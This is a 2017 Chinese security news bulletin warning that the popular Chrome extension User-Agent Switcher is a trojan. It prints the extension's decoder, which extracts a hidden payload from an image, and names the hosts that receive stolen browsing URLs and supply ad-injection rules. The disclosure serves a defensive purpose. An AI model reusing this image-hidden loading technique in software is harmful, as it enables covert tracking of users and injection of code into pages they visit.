安全動態(tài)

快訊 丨流行Chrome插件User-Agent Switcher為木馬程序,請盡快卸載
來源:聚銘網(wǎng)絡(luò)    發(fā)布時間:2017-09-10    瀏覽次數(shù):
 

信息來源:FreeBuf

剛剛曝出的消息,Chrome商店搜索User-Agent Switcher,排名第一的插件居然是一款木馬程序!而這款工具,很多安全技術(shù)人員也都在使用。

這款插件的表面功能是使Chrome可以轉(zhuǎn)換為別的瀏覽器進行訪問,如IE、Safari、360甚至iOS、 Android等移動瀏覽器,方便用戶進行測試。此外,User-Agent Switcher還可以修改瀏覽器的UA,支持自動切換模式,讓Chrome始終用指定的UA去訪問某些網(wǎng)站。

但是,這款插件其實是一個包含惡意代碼的木馬程序。打開谷歌應(yīng)用商店(插件地址),可以看到其用戶數(shù)超過45萬人,截至發(fā)稿共有1300多名用戶對其進行了評價,平均評分4.38顆星。

1.png

插件截圖

為了繞過Chrome的審核策略,其作者把惡意代碼隱藏在了promo.jpg里。插件的background.js第80行代碼,可以從圖片里解密出惡意代碼并執(zhí)行。

t.prototype.Vh=function(t,e){  

if(""==='../promo.jpg')return"";  

void0===t&&(t='../promo.jpg'),t.length&&(t=r.Wk(t)),e=e||{};  

varn=this.ET,  

i=e.mp||n.mp,  

o=e.Tv||n.Tv,  

h=e.At||n.At,  

a=r.Yb(Math.pow(2,i)),  

f=(e.WC||n.WC,e.TY||n.TY),  

u=document.createElement("canvas"),  

p=u.getContext("2d");  

if(u.style.display="none",u.width=e.width||t.width,u.height=e.width||t.height,0===u.width||0===u.height)return"";  

e.height&&e.width?p.drawImage(t,0,0,e.width,e.height):p.drawImage(t,0,0);  

varc=p.getImageData(0,0,u.width,u.height),  

d=c.data,  

g=[];  

if(c.data.every(function(t){  

return0===t  

}))return"";  

varm,s;  

if(1===o)  

for(m=3,s=!1;!s&&m<d.length&&!s;m+=4)s=f(d,m,o),s||g.push(d[m]-(255-a+1));  

varv="",  

w=0,  

y=0,  

l=Math.pow(2,h)-1;  

for(m=0;m<g.length;m+=1)w+=g[m]<<y,y+=i,y>=h&&(v+=String.fromCharCode(w&l),y%=h,w=g[m]>>i-y);  

returnv.length<13?"":(0!==w&&(v+=String.fromCharCode(w&l)),v)  }

只要執(zhí)行這段代碼,插件就會把你瀏覽器打開的每個頁面的url信息加密發(fā)送到這個地址(https://uaswitcher.org/logic/page/data)。另外,該插件還會從地址(http://api.data-monitor.info/api/bhrule?sub=116)獲取推廣鏈接規(guī)則,當用戶打開符合規(guī)則的網(wǎng)站時,就會在當前頁面植入廣告甚至惡意代碼。

據(jù)悉,該作者還在谷歌應(yīng)用商店發(fā)布了如下幾個插件,其安全性同樣值得懷疑:

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

請大家檢查一下自己的瀏覽器,如有發(fā)現(xiàn)安裝,請盡快卸載。

 
 

上一篇:2017年09月09日 聚銘安全速遞

下一篇:微博官方發(fā)布公告:9月15日前所有用戶需實名,否則無法發(fā)博與評論